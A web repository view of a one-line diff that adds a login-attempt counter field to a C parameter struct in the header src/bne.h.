aboutsummaryrefslogtreecommitdiff
path: root/src/bne.h
diff options
context:
space:
mode:
Diffstat (limited to 'src/bne.h')
-rw-r--r--src/bne.h1
1 files changed, 1 insertions, 0 deletions
diff --git a/src/bne.h b/src/bne.h
index 24e0f51..f682008 100644
--- a/src/bne.h
+++ b/src/bne.h
@@ -49,6 +49,7 @@ struct prne_bne_param {
prne_arch_t self;
} rcb;
prne_ip_addr_t subject;
+ unsigned int login_attempt;
};
struct prne_bne_result {